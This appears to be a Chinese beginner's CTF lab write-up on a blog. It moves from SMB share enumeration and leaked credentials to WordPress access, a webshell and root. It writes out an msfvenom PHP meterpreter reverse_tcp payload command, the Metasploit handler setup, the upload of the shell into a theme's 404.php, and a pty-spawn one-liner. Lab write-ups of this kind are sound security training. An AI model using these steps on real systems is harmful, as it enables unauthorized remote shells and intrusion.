小白学习CTF第三天-SMB信息泄露

SMB信息泄露

SMB介绍

在这里插入图片描述

信息探测

基本操作与之前的一样,这里就不过多叙述了。
在这里插入图片描述
信息探测的方式有很多:
在这里插入图片描述
分析探测结果与之前的都类似,基本上分析以下nmap扫描出来的结果。

针对SMB协议弱点进行分析

在这里插入图片描述
针对上面的进行一下实际操作:
IPC我们没有权限查看这个就失败了,换一个扫描
在这里插入图片描述
换成share$:
在这里插入图片描述
我们get敏感文件之后,我们记得查看一下,并且记住里面出现的敏感信息:
在这里插入图片描述
之后我们在去找找其他的敏感信息:
在这里插入图片描述
在这里插入图片描述
查看所得到的敏感文件
在这里插入图片描述
我们在这里发现了用户名以及密码。
我们在之前的扫描结果中发现开放了很多服务,我们都可以使用这个用户名以及密码尝试登陆一下
在这里插入图片描述
在这里插入图片描述
mysql以及ssh都登陆失败了。
在这里插入图片描述
我们使用searchsploit也没有扫描到任何有价值的信息。
那接下来我们只能针对http服务下手了。
在这里插入图片描述
我们在dirb的结果中发现一些有价值的链接,打开看一下:
在这里插入图片描述
尝试使用之前的用户名以及密码登陆:
在这里插入图片描述在这里插入图片描述
登陆成功!

针对HTTP协议弱点分析

在这里插入图片描述
我们需要制作一个webshell来上传上去,以来获取权限。

msfvenom -p php/meterpreter/reverse_tcp lhost = 192.168.56.104 lport = 4444 -f raw

在这里插入图片描述
在这里插入图片描述
复制粘贴一下(注意不要把注释符号也复制进去)
在这里插入图片描述
之后我们使用msfconsole

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp

在这里插入图片描述
之后run一下:
在这里插入图片描述

上传Webshell

在这里插入图片描述
在网页中找到对应的上传位置:
在这里插入图片描述
找到404的位置
在这里插入图片描述
在这里插入图片描述
我们新打开一个网页输入以下地址(主题以及其余内容根据自己情况更改)

http://192.168.56.102/wordpress/wp-content/themes/twentyfifteen/404.php

在这里插入图片描述
之后我们打开之前run 的终端我们会发现它返回了对应的结果:
在这里插入图片描述
执行shell
在这里插入图片描述

查找flag信息

在这里插入图片描述
先优化终端,和之前的操作一样:

python -c "import pty;pty.spawn('/bin/bash')"

之后查找用户名cat /etc/passwd这里存有用户名:
在这里插入图片描述
我们发现用户名是:togie
密码这可能是我们最开始找到的那个敏感信息:12345(尝试一下)
在这里插入图片描述
尝试提权:
在这里插入图片描述
提权成功!!!

最后我们查找flag就可以了!
在这里插入图片描述

总结

在这里插入图片描述
搞定!!!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值